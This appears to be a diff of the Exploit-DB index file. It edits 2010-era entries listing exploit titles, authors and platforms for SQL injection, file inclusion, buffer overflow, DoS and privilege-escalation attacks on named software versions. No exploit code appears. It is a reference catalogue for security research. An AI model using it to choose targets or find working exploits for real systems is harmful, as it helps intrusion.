Inclusion",2010-03-25,mat,php,webapps,0 11883,platforms/php/webapps/11883.txt,"WebSiteBaker 2.8.1 DataBase Backup Disclosure",2010-03-25,Tr0y-x,php,webapps,0 11884,platforms/php/webapps/11884.txt,"Joomla Component dcsFlashGames 2.0RC1 - SQL Injection (catid)",2010-03-26,kaMtiEz,php,webapps,0 -11885,platforms/php/webapps/11885.txt,"Flirt Matching Sms System <= SQL Injection Exploit",2010-03-26,"Easy Laster",php,webapps,0 +11885,platforms/php/webapps/11885.txt,"Flirt Matching Sms System SQL Injection Exploit",2010-03-26,"Easy Laster",php,webapps,0 11886,platforms/windows/remote/11886.py,"SAP MaxDB Malformed Handshake Request Remote Code Execution",2010-03-26,"S2 Crew",windows,remote,0 -11888,platforms/php/webapps/11888.txt,"DaFun Spirit 2.2.5 - Multiple Remote File Include",2010-03-26,2010-03-26,php,webapps,0 +11888,platforms/php/webapps/11888.txt,"DaFun Spirit 2.2.5 - Multiple Remote File Inclusion",2010-03-26,2010-03-26,php,webapps,0 11889,platforms/php/webapps/11889.txt,"leaftec CMS - Multiple vulnerabilities",2010-03-26,Valentin,php,webapps,0 11890,platforms/ios/dos/11890.txt,"iOS Safari - Bad 'VML' Remote DoS",2010-03-26,"Nishant Das Patnaik",ios,dos,0 11891,platforms/ios/dos/11891.txt,"iOS Safari - Remote DoS",2010-03-26,"Nishant Das Patnaik",ios,dos,0 -11892,platforms/php/webapps/11892.txt,"post Card (catid) Remote SQL Injection",2010-03-26,"Hussin X",php,webapps,0 +11892,platforms/php/webapps/11892.txt,"post Card (catid) SQL Injection",2010-03-26,"Hussin X",php,webapps,0 11893,platforms/linux/dos/11893.pl,"tPop3d 1.5.3 DoS",2010-03-26,OrderZero,linux,dos,0 11894,platforms/php/webapps/11894.txt,"cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities",2010-03-26,eidelweiss,php,webapps,0 -11895,platforms/php/webapps/11895.txt,"CyberCMS - Remote SQL Injection",2010-03-26,hc0de,php,webapps,0 +11895,platforms/php/webapps/11895.txt,"CyberCMS - SQL Injection",2010-03-26,hc0de,php,webapps,0 11896,platforms/php/webapps/11896.txt,"BPTutors Tutoring site script - CSRF Create Administrator Account",2010-03-26,bi0,php,webapps,0 11897,platforms/php/webapps/11897.php,"Kasseler CMS 1.4.x lite (Module Jokes) SQL-Injection Exploit",2010-03-26,Sc0rpi0n,php,webapps,0 -11898,platforms/php/webapps/11898.py,"Date & Sex Vor und Rückwärts Auktions System <= 2 - Blind SQL Injection Exploit",2010-03-27,"Easy Laster",php,webapps,0 +11898,platforms/php/webapps/11898.py,"Date & Sex Vor und Rückwärts Auktions System 2 - Blind SQL Injection Exploit",2010-03-27,"Easy Laster",php,webapps,0 11899,platforms/php/webapps/11899.html,"AdaptCMS_Lite_1.5 2009-07-07",2010-03-27,ITSecTeam,php,webapps,0 11900,platforms/windows/local/11900.pl,"Mini-stream RM-MP3 Converter 3.0.0.7 - (.pls) Universal Stack BoF",2010-03-27,mat,windows,local,0 -11902,platforms/php/webapps/11902.txt,"MyOWNspace 8.2 - Multi Local File Include",2010-03-27,ITSecTeam,php,webapps,0 +11902,platforms/php/webapps/11902.txt,"MyOWNspace 8.2 - Multi Local File Inclusion",2010-03-27,ITSecTeam,php,webapps,0 11903,platforms/php/webapps/11903.txt,"Open Web Analytics 1.2.3 - multi file include",2010-03-27,ITSecTeam,php,webapps,0 -11904,platforms/php/webapps/11904.txt,"68kb multi Remote file include",2010-03-27,ITSecTeam,php,webapps,0 +11904,platforms/php/webapps/11904.txt,"68kb - Multi Remote File Inclusion",2010-03-27,ITSecTeam,php,webapps,0 11905,platforms/php/webapps/11905.txt,"Simple Machines Forum (SMF) <= 1.1.8 - (avatar) Remote PHP File Execute PoC",2010-03-27,JosS,php,webapps,0 -11906,platforms/php/webapps/11906.txt,"Uebimiau Webmail <= 2.7.2 - Multiple Vulnerabilities",2010-03-27,"cp77fk4r ",php,webapps,0 +11906,platforms/php/webapps/11906.txt,"Uebimiau Webmail 2.7.2 - Multiple Vulnerabilities",2010-03-27,"cp77fk4r ",php,webapps,0 11908,platforms/php/webapps/11908.txt,"Joomla Component com_solution SQL Injection",2010-03-27,"DevilZ TM",php,webapps,0 11909,platforms/windows/local/11909.txt,"Mini-stream Ripper 3.1.0.8 - Local Stack Overflow Exploit",2010-03-28,"Hazem mofeed",windows,local,0 -11911,platforms/windows/local/11911.py,"Stud_PE <= 2.6.05 - Stack Overflow PoC Exploit",2010-03-28,zha0,windows,local,0 +11911,platforms/windows/local/11911.py,"Stud_PE 2.6.05 - Stack Overflow PoC Exploit",2010-03-28,zha0,windows,local,0 11912,platforms/php/webapps/11912.txt,"Multi Auktions Komplett System 2 - Blind SQL Injection Exploit",2010-03-28,"Easy Laster",php,webapps,0 11914,platforms/php/webapps/11914.txt,"Joomla Component com_adds Blind SQL Injection",2010-03-28,"DevilZ TM",php,webapps,0 11915,platforms/php/webapps/11915.txt,"Joomla Component com_tariff SQL Injection",2010-03-28,"DevilZ TM",php,webapps,0 @@ -10902,7 +10902,7 @@ id,file,description,date,author,platform,type,port 11930,platforms/windows/dos/11930.pl,"ASX to MP3 Converter 3.0.0.100 - Local Stack Overflow PoC",2010-03-29,mat,windows,dos,0 11931,platforms/asp/webapps/11931.txt,"Asp - comersus7F Shopping Cart Software Backup Dump",2010-03-29,indoushka,asp,webapps,0 11932,platforms/linux/dos/11932.txt,"xwine 1.0.1 - (.exe) Local Crash PoC Exploit",2010-03-29,JosS,linux,dos,0 -11934,platforms/php/webapps/11934.txt,"Powie's PSCRIPT Gästebuch <= 2.09 - SQL Injection",2010-03-29,"Easy Laster",php,webapps,0 +11934,platforms/php/webapps/11934.txt,"Powie's PSCRIPT Gästebuch 2.09 - SQL Injection",2010-03-29,"Easy Laster",php,webapps,0 11935,platforms/php/webapps/11935.txt,"Joomla Component com_guide SQL Injection",2010-03-30,"DevilZ TM",php,webapps,0 11938,platforms/php/webapps/11938.txt,"Pepsi CMS (Irmin cms) pepsi-0.6-BETA2 - Multiple Local File",2010-03-30,eidelweiss,php,webapps,0 11939,platforms/php/webapps/11939.txt,"Joomla Component com_spec SQL Injection",2010-03-29,"DevilZ TM",php,webapps,0 @@ -10923,10 +10923,10 @@ id,file,description,date,author,platform,type,port 11957,platforms/windows/local/11957.py,"Shadow Stream Recorder 3.0.1.7 - (.asx) Local Buffer Overflow",2010-03-30,b0telh0,windows,local,0 11958,platforms/windows/local/11958.py,"ASX to MP3 Converter 3.0.0.100 - Local Stack Overflow Exploit",2010-03-30,"Hazem mofeed",windows,local,0 11959,platforms/windows/dos/11959.pl,"Xilisoft Blackberry Ring Tone Maker - (.wma) Local Crash",2010-03-30,anonymous,windows,dos,0 -11960,platforms/php/webapps/11960.txt,"KimsQ 040109 - Multiple Remote File Include",2010-03-30,mat,php,webapps,0 +11960,platforms/php/webapps/11960.txt,"KimsQ 040109 - Multiple Remote File Inclusion",2010-03-30,mat,php,webapps,0 11962,platforms/php/webapps/11962.txt,"Satellite-X 4.0 - (Auth Bypass) SQL Injection",2010-03-30,indoushka,php,webapps,0 11963,platforms/php/webapps/11963.txt,"Huron CMS 8 11 2007 - (Auth Bypass) SQL Injection",2010-03-30,mat,php,webapps,0 -11964,platforms/multiple/webapps/11964.pl,"Easy-Clanpage <= 2.1 - SQL Injection Exploit",2010-03-30,"Easy Laster",multiple,webapps,0 +11964,platforms/multiple/webapps/11964.pl,"Easy-Clanpage 2.1 - SQL Injection Exploit",2010-03-30,"Easy Laster",multiple,webapps,0 11965,platforms/php/webapps/11965.txt,"kora Reinstall Admin Information",2010-03-30,indoushka,php,webapps,0 11966,platforms/windows/dos/11966.py,"Easy Icon Maker .ico File Reading Crash",2010-03-30,ITSecTeam,windows,dos,0 11967,platforms/php/webapps/11967.txt,"Snipe Photo Gallery - Bypass Remote Upload",2010-03-30,indoushka,php,webapps,0 @@ -10938,10 +10938,10 @@ id,file,description,date,author,platform,type,port 11977,platforms/windows/dos/11977.pl,"CDTrustee .BAK Local Crash PoC",2010-03-31,anonymous,windows,dos,0 11978,platforms/php/webapps/11978.txt,"Joomla Component DW Graph Local File Inclusion",2010-03-31,"Chip d3 bi0s",php,webapps,0 11979,platforms/php/webapps/11979.pl,"Centreon IT & Network Monitoring 2.1.5 - Injection SQL",2010-03-31,"Jonathan Salwan",php,webapps,0 -11980,platforms/php/webapps/11980.txt,"Easy-Clanpage <= 2.2 - Multiple SQL Injection + Exploit",2010-03-31,"Easy Laster",php,webapps,0 +11980,platforms/php/webapps/11980.txt,"Easy-Clanpage 2.2 - Multiple SQL Injection + Exploit",2010-03-31,"Easy Laster",php,webapps,0 11981,platforms/windows/local/11981.py,"WM Downloader 3.0.0.9 - (.asx) Local Buffer Overflow",2010-03-31,b0telh0,windows,local,0 11984,platforms/windows/dos/11984.py,"Optimal Archive 1.38 - (.zip) SEH PoC (0Day)",2010-03-31,TecR0c,windows,dos,0 -11985,platforms/windows/dos/11985.sh,"BitComet <= 1.19 - Remote DoS Exploit",2010-03-31,"Pierre Nogues",windows,dos,0 +11985,platforms/windows/dos/11985.sh,"BitComet 1.19 - Remote DoS Exploit",2010-03-31,"Pierre Nogues",windows,dos,0 11986,platforms/linux/remote/11986.py,"OpenDcHub 0.8.1 - Remote Code Execution Exploit",2010-03-31,"Pierre Nogues",linux,remote,0 11987,platforms/windows/dos/11987.txt,"Escape From PDF",2010-03-31,"Didier Stevens",windows,dos,0 11989,platforms/php/webapps/11989.txt,"Faweb_2 - Multiple Vulnerabilities",2010-03-30,indoushka,php,webapps,0 @@ -10962,10 +10962,10 @@ id,file,description,date,author,platform,type,port 12004,platforms/php/webapps/12004.txt,"PHP Jokesite 2.0 - exec Command Exploit",2010-04-01,indoushka,php,webapps,0 12005,platforms/php/webapps/12005.txt,"Profi Einzelgebots Auktions System Blind SQL Injection",2010-04-01,"Easy Laster",php,webapps,0 12006,platforms/php/webapps/12006.txt,"Simple Calculator by Peter Rekdal Sunde Remote Upload",2010-04-01,indoushka,php,webapps,0 -12007,platforms/php/webapps/12007.txt,"SimpNews <= 2.16.2 - Multiple SQL Injection Vulnerabilities",2010-04-01,NoGe,php,webapps,0 +12007,platforms/php/webapps/12007.txt,"SimpNews 2.16.2 - Multiple SQL Injection Vulnerabilities",2010-04-01,NoGe,php,webapps,0 12008,platforms/windows/local/12008.pl,"TugZip 3.5 Zip File Buffer Overflow",2010-04-01,Lincoln,windows,local,0 12009,platforms/php/webapps/12009.html,"CMS Made Simple 1.7 - CSRF",2010-04-02,"pratul agrawal",php,webapps,0 -12010,platforms/windows/dos/12010.pl,"uTorrent WebUI <= 0.370 - Authorization header DoS Exploit",2010-04-02,"zombiefx darkernet",windows,dos,0 +12010,platforms/windows/dos/12010.pl,"uTorrent WebUI 0.370 - Authorization header DoS Exploit",2010-04-02,"zombiefx darkernet",windows,dos,0 12011,platforms/windows/dos/12011.txt,"Google Chrome 4.1 OOB Array Indexing Bug",2010-04-02,"Tobias Klein",windows,dos,0 12012,platforms/windows/local/12012.txt,"Free MP3 CD Ripper 2.6 - (0Day) (2)",2010-04-02,"Richard leahy",windows,local,0 12015,platforms/php/webapps/12015.txt,"Joomla Component com_menu SQL Injection",2010-04-02,"DevilZ TM",php,webapps,0 @@ -10980,11 +10980,11 @@ id,file,description,date,author,platform,type,port 12026,platforms/php/webapps/12026.txt,"phpscripte24 Vor und Rückwärts Auktions System - Blind SQL Injection",2010-04-03,"Easy Laster",php,webapps,0 12027,platforms/windows/dos/12027.py,"DSEmu 0.4.10 - (.nds) Local Crash Exploit",2010-04-03,l3D,windows,dos,0 12028,platforms/php/webapps/12028.txt,"PHP-fusion dsmsf - (module downloads) SQL Injection Exploit",2010-04-03,Inj3ct0r,php,webapps,0 -12029,platforms/asp/webapps/12029.txt,"SafeSHOP <= 1.5.6 - Cross-Site Scripting & Multiple Cross-Site Request Forgery",2010-04-03,"cp77fk4r ",asp,webapps,0 +12029,platforms/asp/webapps/12029.txt,"SafeSHOP 1.5.6 - Cross-Site Scripting & Multiple Cross-Site Request Forgery",2010-04-03,"cp77fk4r ",asp,webapps,0 12030,platforms/windows/dos/12030.html,"IncrediMail 2.0 - ActiveX (Authenticate) bof PoC",2010-04-03,d3b4g,windows,dos,0 12031,platforms/php/webapps/12031.html,"Advanced Management For Services Sites Remote Add Admin Exploit",2010-04-03,alnjm33,php,webapps,0 12032,platforms/windows/dos/12032.html,"Microsoft Internet Explorer Tabular Data Control ActiveX Remote Code Execution",2010-04-03,ZSploit.com,windows,dos,0 -12033,platforms/multiple/remote/12033.txt,"Java Mini Web Server <= 1.0 Path Traversal and Cross-Site Scripting",2010-04-03,"cp77fk4r ",multiple,remote,0 +12033,platforms/multiple/remote/12033.txt,"Java Mini Web Server 1.0 Path Traversal and Cross-Site Scripting",2010-04-03,"cp77fk4r ",multiple,remote,0 12034,platforms/php/webapps/12034.txt,"flatpress 0.909.1 - Stored XSS",2010-04-03,ITSecTeam,php,webapps,0 12035,platforms/windows/local/12035.pl,"ZipScan 2.2c SEH",2010-04-03,"Lincoln and corelanc0d3r",windows,local,0 12036,platforms/hardware/webapps/12036.txt,"Edimax AR-7084GA Router CSRF + Persistent XSS Exploit",2010-04-03,l3D,hardware,webapps,0 @@ -10999,9 +10999,9 @@ id,file,description,date,author,platform,type,port 12047,platforms/php/webapps/12047.html,"nodesforum 1.033 - Remote File Inclusion",2010-04-04,ITSecTeam,php,webapps,0 12048,platforms/php/webapps/12048.html,"ttCMS 5.0 - Remote File Inclusion",2010-04-04,ITSecTeam,php,webapps,0 12049,platforms/php/webapps/12049.html,"Uiga Proxy Remote File Inclusion",2010-04-04,ITSecTeam,php,webapps,0 -12050,platforms/php/webapps/12050.txt,"MassMirror Uploader - Multiple RFI Exploit",2010-04-04,"cr4wl3r ",php,webapps,0 +12050,platforms/php/webapps/12050.txt,"MassMirror Uploader - Multiple Remote File Inclusion Exploit",2010-04-04,"cr4wl3r ",php,webapps,0 12051,platforms/windows/local/12051.php,"PHP 6.0 Dev - str_transliterate() Buffer Overflow Exploit (0Day)",2010-04-04,"Yakir Wizman",windows,local,0 -12052,platforms/php/webapps/12052.txt,"SAGU-PRO 1.0 - Multiple Remote File Include",2010-04-04,mat,php,webapps,0 +12052,platforms/php/webapps/12052.txt,"SAGU-PRO 1.0 - Multiple Remote File Inclusion",2010-04-04,mat,php,webapps,0 12053,platforms/windows/local/12053.py,"ZipCentral - (.zip) SEH Exploit",2010-04-04,TecR0c,windows,local,0 12054,platforms/php/webapps/12054.txt,"Joomla Component redSHOP - Local File Inclusion",2010-04-04,NoGe,php,webapps,0 12055,platforms/php/webapps/12055.txt,"Joomla Component redTWITTER Local File Inclusion",2010-04-04,NoGe,php,webapps,0 @@ -11023,11 +11023,11 @@ id,file,description,date,author,platform,type,port 12073,platforms/windows/dos/12073.pl,"MP3 Wav Editor 3.80 - (.mp3) Local DoS",2010-04-05,anonymous,windows,dos,0 12074,platforms/windows/dos/12074.pl,"Portable AVS DVD Authoring 1.3.3.51 - Local Crash PoC",2010-04-05,R3d-D3V!L,windows,dos,0 12075,platforms/php/webapps/12075.txt,"LionWiki 3.x - (index.php) Shell Upload",2010-04-05,ayastar,php,webapps,0 -12076,platforms/php/webapps/12076.pl,"ilchClan <= 1.0.5 - (cid) SQL Injection & Exploit",2010-04-05,"Easy Laster",php,webapps,0 +12076,platforms/php/webapps/12076.pl,"ilchClan 1.0.5 - (cid) SQL Injection & Exploit",2010-04-05,"Easy Laster",php,webapps,0 12077,platforms/php/webapps/12077.txt,"Joomla Component News Portal com_news Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0 12078,platforms/php/webapps/12078.txt,"Joomla Freestyle FAQ Lite Component 1.3 com_fss (faqid) SQL Injection",2010-04-06,"Chip d3 bi0s",php,webapps,0 12079,platforms/windows/dos/12079.pl,"Microsoft Office (2010 beta) Communicator SIP Denial of Service Exploit",2010-04-06,indoushka,windows,dos,0 -12080,platforms/windows/dos/12080.txt,"Foxit Reader <= 3.2.1.0401 - Denial of Service Exploit",2010-04-06,juza,windows,dos,0 +12080,platforms/windows/dos/12080.txt,"Foxit Reader 3.2.1.0401 - Denial of Service Exploit",2010-04-06,juza,windows,dos,0 12081,platforms/windows/dos/12081.php,"Jzip 1.3 - (.zip) Unicode Buffer Overflow PoC (0Day)",2010-04-06,mr_me,windows,dos,0 12082,platforms/php/webapps/12082.txt,"Joomla Component Saber Cart com_sebercart Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0 12083,platforms/php/webapps/12083.txt,"Joomla Component J!WHMCS Integrator com_jwhmcs Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0 @@ -11045,7 +11045,7 @@ id,file,description,date,author,platform,type,port 12095,platforms/linux/dos/12095.txt,"Virata EmWeb R6.0.1 - Remote Crash",2010-04-06,"Jobert Abma",linux,dos,0 12096,platforms/windows/dos/12096.txt,"Juke 4.0.2 DoS Multiple Files",2010-04-06,anonymous,windows,dos,0 12097,platforms/php/webapps/12097.txt,"Joomla Component XOBBIX - prodid SQL Injection",2010-04-06,AntiSecurity,php,webapps,0 -12098,platforms/php/webapps/12098.txt,"WordPress Plugin NextGEN Gallery <= 1.5.1 - XSS",2010-04-06,"Alejandro Rodriguez",php,webapps,0 +12098,platforms/php/webapps/12098.txt,"WordPress Plugin NextGEN Gallery 1.5.1 - XSS",2010-04-06,"Alejandro Rodriguez",php,webapps,0 12100,platforms/asp/webapps/12100.txt,"Espinas CMS SQL Injection",2010-04-07,"Pouya Daneshmand",asp,webapps,0 12101,platforms/php/webapps/12101.txt,"Joomla Component aWiki com_awiki Local File Inclusion",2010-04-07,"Angela Zhang",php,webapps,0 12102,platforms/php/webapps/12102.txt,"Joomla Component VJDEO com_vjdeo 1.0 - LFI",2010-04-07,"Angela Zhang",php,webapps,0 @@ -11059,9 +11059,9 @@ id,file,description,date,author,platform,type,port 12110,platforms/windows/dos/12110.pl,"CompleteFTP 3.3.0 - Remote Memory Consumption DoS",2010-04-08,"Jonathan Salwan",windows,dos,0 12111,platforms/php/webapps/12111.txt,"Joomla Component Webee Comments Local File Inclusion",2010-04-08,AntiSecurity,php,webapps,0 12112,platforms/php/webapps/12112.txt,"Joomla Component Realtyna Translator Local File Inclusion",2010-04-08,AntiSecurity,php,webapps,0 -12113,platforms/php/webapps/12113.txt,"Joomla Component AWDwall-Joomla - LFI & SQLi [cbuser]",2010-04-08,AntiSecurity,php,webapps,0 -12114,platforms/multiple/remote/12114.txt,"miniature java Web server <= 1.71 - Multiple Vulnerabilities",2010-04-08,"cp77fk4r ",multiple,remote,0 -12115,platforms/php/webapps/12115.txt,"Kubeit CMS Remote SQL Injection",2010-04-08,Phenom,php,webapps,0 +12113,platforms/php/webapps/12113.txt,"Joomla Component AWDwall-Joomla - LFI / SQLi [cbuser]",2010-04-08,AntiSecurity,php,webapps,0 +12114,platforms/multiple/remote/12114.txt,"miniature java Web server 1.71 - Multiple Vulnerabilities",2010-04-08,"cp77fk4r ",multiple,remote,0 +12115,platforms/php/webapps/12115.txt,"Kubeit CMS SQL Injection",2010-04-08,Phenom,php,webapps,0 12117,platforms/windows/remote/12117.txt,"Java Deployment Toolkit Performs Insufficient Validation of Parameters",2010-04-09,"Tavis Ormandy",windows,remote,0 12118,platforms/php/webapps/12118.txt,"Joomla Component PowerMail Pro com_powermail Local File Inclusion",2010-04-09,AntiSecurity,php,webapps,0 12119,platforms/windows/remote/12119.pl,"Windows FTP Server 1.4 - Auth Bypass",2010-04-09,chap0,windows,remote,0 @@ -11071,17 +11071,17 @@ id,file,description,date,author,platform,type,port 12123,platforms/php/webapps/12123.txt,"joomla Component com_pcchess Local File Inclusion",2010-04-09,team_elite,php,webapps,0 12124,platforms/php/webapps/12124.txt,"joomla component huruhelpdesk SQL Injection",2010-04-09,bumble_be,php,webapps,0 12128,platforms/php/webapps/12128.txt,"GarageSales Remote Upload",2010-04-09,saidinh0,php,webapps,0 -12130,platforms/linux/local/12130.py,"ReiserFS xattr (Linux Kernel <= 2.6.34-rc3) (Redhat / Ubuntu 9.10) - Privilege Escalation",2010-04-09,"Jon Oberheide",linux,local,0 +12130,platforms/linux/local/12130.py,"ReiserFS xattr (Linux Kernel 2.6.34-rc3) (Redhat / Ubuntu 9.10) - Privilege Escalation",2010-04-09,"Jon Oberheide",linux,local,0 12131,platforms/windows/dos/12131.py,"Tembria Server Monitor 5.6.0 - Denial of Service",2010-04-09,Lincoln,windows,dos,0 12132,platforms/php/webapps/12132.pl,"joomla component com_agenda 1.0.1 - (id) SQL Injection",2010-04-09,v3n0m,php,webapps,0 12133,platforms/multiple/webapps/12133.txt,"Asset Manager 1.0 Shell Upload",2010-04-09,"Shichemt Alen and NeT_Own3r",multiple,webapps,0 -12134,platforms/php/webapps/12134.txt,"MMHAQ CMS SQLi vulnersbility",2010-04-10,s1ayer,php,webapps,0 -12135,platforms/php/webapps/12135.txt,"mygamingladder MGL Combo System <= 7.5 - SQL Injection",2010-04-10,"Easy Laster",php,webapps,0 +12134,platforms/php/webapps/12134.txt,"MMHAQ CMS - SQLi",2010-04-10,s1ayer,php,webapps,0 +12135,platforms/php/webapps/12135.txt,"mygamingladder MGL Combo System 7.5 - SQL Injection",2010-04-10,"Easy Laster",php,webapps,0 12136,platforms/php/webapps/12136.txt,"Joomla Component com_properties[aid] - SQL Injection",2010-04-10,c4uR,php,webapps,0 12137,platforms/php/webapps/12137.txt,"joomla component allvideos BLIND SQL Injection",2010-04-10,bumble_be,php,webapps,0 12138,platforms/php/webapps/12138.txt,"Joomla Com_Ca SQL Injection",2010-04-10,DigitALL,php,webapps,0 12139,platforms/php/webapps/12139.txt,"Kiasabz Article News CMS Magazine SQL Injection",2010-04-10,indoushka,php,webapps,0 -12140,platforms/php/webapps/12140.php,"xBtiTracker Remote SQL Injection",2010-04-11,InATeam,php,webapps,0 +12140,platforms/php/webapps/12140.php,"xBtiTracker SQL Injection",2010-04-11,InATeam,php,webapps,0 12141,platforms/php/webapps/12141.txt,"MediaInSpot CMS LFI",2010-04-11,"Amoo Arash",php,webapps,0 12142,platforms/php/webapps/12142.txt,"Joomla Component TweetLA! Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 12143,platforms/php/webapps/12143.txt,"Joomla Component Ticketbook Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 @@ -11099,7 +11099,7 @@ id,file,description,date,author,platform,type,port 12155,platforms/php/webapps/12155.txt,"AuroraGPT 4.0 - RCE",2010-04-11,"Amoo Arash",php,webapps,0 12156,platforms/windows/remote/12156.txt,"IE/Opera source code viewer Null Character Handling",2010-04-11,"Daniel Correa",windows,remote,0 12157,platforms/php/webapps/12157.txt,"OnePC mySite Management Software SQL Injection",2010-04-11,Valentin,php,webapps,0 -12158,platforms/php/webapps/12158.py,"Elite Gaming Ladders <= 3.5 - (match) SQL injection",2010-04-11,"Easy Laster",php,webapps,0 +12158,platforms/php/webapps/12158.py,"Elite Gaming Ladders 3.5 - (match) SQL injection",2010-04-11,"Easy Laster",php,webapps,0 12159,platforms/php/webapps/12159.txt,"Joomla Component Multi-Venue Restaurant Menu Manager SQL Injection",2010-04-11,Valentin,php,webapps,0 12160,platforms/php/webapps/12160.txt,"HotNews 0.7.2 - Remote File Inclusion",2010-04-11,team_elite,php,webapps,0 12161,platforms/windows/dos/12161.pl,"Aladdin eToken PKI Client 4.5 - Virtual File Handling Unspecified Memory Corruption PoC",2010-04-11,LiquidWorm,windows,dos,0 @@ -11120,7 +11120,7 @@ id,file,description,date,author,platform,type,port 12176,platforms/php/webapps/12176.txt,"Joomla Component Memory Book com_memory Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 12177,platforms/php/webapps/12177.txt,"Joomla Component Online Market com_market Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 12178,platforms/php/webapps/12178.txt,"Joomla Component Digital Diary com_diary Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 -12179,platforms/php/webapps/12179.txt,"FusionForge 5.0 - Multiple Remote File Include",2010-04-12,"cr4wl3r ",php,webapps,0 +12179,platforms/php/webapps/12179.txt,"FusionForge 5.0 - Multiple Remote File Inclusion",2010-04-12,"cr4wl3r ",php,webapps,0 12180,platforms/php/webapps/12180.txt,"Joomla com_worldrates Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 12181,platforms/php/webapps/12181.txt,"Joomla com_record Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 12182,platforms/php/webapps/12182.txt,"Joomla com_sweetykeeper Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 @@ -11133,10 +11133,10 @@ id,file,description,date,author,platform,type,port 12189,platforms/windows/local/12189.php,"PHP 6.0 Dev - str_transliterate() Buffer Overflow (NX + ASLR Bypass)",2010-04-13,ryujin,windows,local,0 12190,platforms/php/webapps/12190.txt,"Joomla Component Jvehicles (aid) SQL Injection",2010-04-13,"Don Tukulesto",php,webapps,0 12191,platforms/php/webapps/12191.txt,"joomla component com_jp_jobs 1.2.0 - (id) SQL Injection",2010-04-13,v3n0m,php,webapps,0 -12192,platforms/php/webapps/12192.txt,"blog system <= 1.5 - Multiple Vulnerabilities",2010-04-13,"cp77fk4r ",php,webapps,0 +12192,platforms/php/webapps/12192.txt,"blog system 1.5 - Multiple Vulnerabilities",2010-04-13,"cp77fk4r ",php,webapps,0 12193,platforms/php/webapps/12193.txt,"Openurgence vaccin 1.03 - (RFI/LFI) Multiple File Include",2010-04-13,"cr4wl3r ",php,webapps,0 12194,platforms/php/webapps/12194.txt,"Police Municipale Open Main Courante 1.01beta - (RFI/LFI) Multiple File Include",2010-04-13,"cr4wl3r ",php,webapps,0 -12195,platforms/php/webapps/12195.rb,"joelz bulletin board <= 0.9.9rc3 - Multiple SQL Injection & Exploit",2010-04-13,"Easy Laster",php,webapps,0 +12195,platforms/php/webapps/12195.rb,"joelz bulletin board 0.9.9rc3 - Multiple SQL Injection & Exploit",2010-04-13,"Easy Laster",php,webapps,0 12197,platforms/asp/webapps/12197.txt,"Mp3 MuZik Data Base Download",2010-04-13,indoushka,asp,webapps,0 12198,platforms/php/webapps/12198.txt,"Games Script (Galore) Backup Dump",2010-04-13,indoushka,php,webapps,0 12199,platforms/asp/webapps/12199.txt,"My School Script Data Base Download",2010-04-13,indoushka,asp,webapps,0 @@ -11149,13 +11149,13 @@ id,file,description,date,author,platform,type,port 12206,platforms/windows/dos/12206.html,"MagnetoSoft NetworkResources 4.0.0.5 - ActiveX NetFileClose SEH Overwrite PoC",2010-04-13,s4squatch,windows,dos,0 12207,platforms/windows/dos/12207.html,"MagnetoSoft NetworkResources 4.0.0.5 - ActiveX NetShareEnum SEH Overwrite PoC",2010-04-13,s4squatch,windows,dos,0 12208,platforms/windows/dos/12208.html,"MagnetoSoft NetworkResources ActiveX NetConnectionEnum SEH Overwrite PoC",2010-04-13,s4squatch,windows,dos,0 -12212,platforms/php/webapps/12212.txt,"Opentel Openmairie tel 1.02 - Local File Include",2010-04-14,"cr4wl3r ",php,webapps,0 -12213,platforms/windows/local/12213.c,"Micropoint Proactive Denfense Mp110013.sys <= 1.3.10123.0 - Local Privilege Escalation Exploit",2010-04-14,MJ0011,windows,local,0 +12212,platforms/php/webapps/12212.txt,"Opentel Openmairie tel 1.02 - Local File Inclusion",2010-04-14,"cr4wl3r ",php,webapps,0 +12213,platforms/windows/local/12213.c,"Micropoint Proactive Denfense Mp110013.sys 1.3.10123.0 - Local Privilege Escalation Exploit",2010-04-14,MJ0011,windows,local,0 12217,platforms/multiple/dos/12217.py,"Remote Exploit Against the Aircrack-NG Tools svn r1675",2010-04-14,"Lukas Lueg",multiple,dos,0 12218,platforms/asp/webapps/12218.txt,"School Management System Pro 6.0.0 Backup Dump",2010-04-14,indoushka,asp,webapps,0 -12219,platforms/php/webapps/12219.txt,"Mp3 Online Id Tag Editor - RFI",2010-04-14,indoushka,php,webapps,0 -12220,platforms/php/webapps/12220.txt,"Almnzm <= 2.1 - SQL Injection",2010-04-14,"NeX HaCkEr",php,webapps,0 -12221,platforms/php/webapps/12221.rb,"Bild Flirt <= 1.0 - SQL Injection Exploit",2010-04-14,"Easy Laster",php,webapps,0 +12219,platforms/php/webapps/12219.txt,"Mp3 Online Id Tag Editor - Remote File Inclusion",2010-04-14,indoushka,php,webapps,0 +12220,platforms/php/webapps/12220.txt,"Almnzm 2.1 - SQL Injection",2010-04-14,"NeX HaCkEr",php,webapps,0 +12221,platforms/php/webapps/12221.rb,"Bild Flirt 1.0 - SQL Injection Exploit",2010-04-14,"Easy Laster",php,webapps,0 12222,platforms/php/webapps/12222.txt,"PhpMesFilms 1.8 - SQL Injection",2010-04-14,indoushka,php,webapps,0 12223,platforms/php/webapps/12223.txt,"Multi-Mirror Remote Upload",2010-04-14,indoushka,php,webapps,0 12224,platforms/php/webapps/12224.txt,"Mihalism Multi Host 4.0.0 - Upload",2010-04-14,indoushka,php,webapps,0 @@ -11178,7 +11178,7 @@ id,file,description,date,author,platform,type,port 12241,platforms/php/webapps/12241.txt,"Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities",2010-04-14,eidelweiss,php,webapps,0 12242,platforms/jsp/webapps/12242.txt,"RJ-iTop Network Vulnerability Scanner System - Multiple SQL Injections",2010-04-14,wsn1983,jsp,webapps,0 12243,platforms/windows/dos/12243.py,"RPM Select/Elite 5.0 - (.xml config parsing) Unicode Buffer Overflow PoC",2010-04-14,mr_me,windows,dos,0 -12244,platforms/windows/remote/12244.txt,"iMesh <= 7.1.0.x - (IMWeb.dll 7.0.0.x) Remote Heap Overflow Exploit",2007-12-18,rgod,windows,remote,0 